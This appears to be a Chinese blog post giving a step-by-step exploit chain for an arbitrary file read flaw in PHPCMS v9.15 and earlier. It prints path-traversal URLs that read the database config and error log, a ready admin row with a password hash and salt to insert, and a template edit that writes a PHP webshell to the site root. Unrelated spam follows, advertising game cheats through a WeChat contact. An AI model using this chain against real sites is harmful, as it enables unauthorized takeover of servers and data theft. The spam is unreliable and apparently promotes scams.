phpcmsv9.15以下任意文件读取漏洞
admin
2023-01-27 07:57:03
0

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php

成功读取数据库信息如下:
phpcmsv9.15以下任意文件读取漏洞 

爆网站路径:

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php



phpcmsv9.15以下任意文件读取漏洞 


打开phpcmsV9数据库并且找到admin表,向表中添加一条数据,因为我们没法破解他的密码那么咱们就自己

添加一个用户以便能够登录后台操作:

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意这几项必须添负责登录不了的。应为这条记录的意思是添加用户名为admin,密码为:creturn.com的超级管理员



phpcmsv9.15以下任意文件读取漏洞 

后台登录地址:localhost/index.php?m=admin

用户名:admin 密码:creturn.com

登录后台后我们找到界面-》模版风格-》选择默认模版点击详情列表


phpcmsv9.15以下任意文件读取漏洞 

然后点击里面的search目录下面的index.html右侧的编辑

phpcmsv9.15以下任意文件读取漏洞 

修改其模版为:

  1. ';file_put_contents('shell.php',$shell);?>

复制代码

提交保存

然后访问:localhost/index.php?m=search

会在根目录生成一个shell.php的一句话,我们连接看看


phpcmsv9.15以下任意文件读取漏洞 

可以看到已经拿到shell,记得把修改的模版改回去。

或者可以直接通过mysql数据库及爆出的路径写一句话

相关内容

热门资讯

今日重大发现“青松游戏.真的有... 您好:青松游戏这款游戏可以开挂,确实是有挂的,需要了解加客服微信【4282891】很多玩家在这款游戏...
以军称打死哈马斯高级指挥官,哈... 巴勒斯坦伊斯兰抵抗运动(哈马斯)当地时间13日发表声明称,以色列战机当天在加沙城以西袭击一辆民用车辆...
今日重磅消息“杭麻圈.到底是不... 网上科普关于“杭麻圈有没有挂”话题很是火热,小编也是针对杭麻圈作*弊开挂的方法以及开挂对应的知识点,...
玩家最新攻略“微乐卡五星.怎么... 网上科普关于“微乐卡五星有没有挂”话题很是火热,小编也是针对微乐卡五星作*弊开挂的方法以及开挂对应的...
当AI成为人类确认自我的“参照... 来源:滚动播报 (来源:上观新闻) 人工智能(AI)会给人类最隐秘的精神世界带来什么改变?有哪些...
【第一财经】“胡一把麻将.怎么... 您好:胡一把麻将这款游戏可以开挂,确实是有挂的,需要了解加客服微信【9784099】很多玩家在这款游...
【今日要闻】“玄龙二厅.开挂器... 您好:玄龙二厅这款游戏可以开挂,确实是有挂的,需要了解加客服微信【9784099】很多玩家在这款游戏...
重磅消息“天府麻舍.开挂神器?... 有 亲,根据资深记者爆料天府麻舍是可以开挂的,确实有挂(咨询软件无需打开...
今日重大通报“潮汕掌上娱.开挂... 有 亲,根据资深记者爆料潮汕掌上娱是可以开挂的,确实有挂(咨询软件无需打...
【第一资讯】“情怀麻将.开挂神... 您好:情怀麻将这款游戏可以开挂,确实是有挂的,需要了解加客服微信【9784099】很多玩家在这款游戏...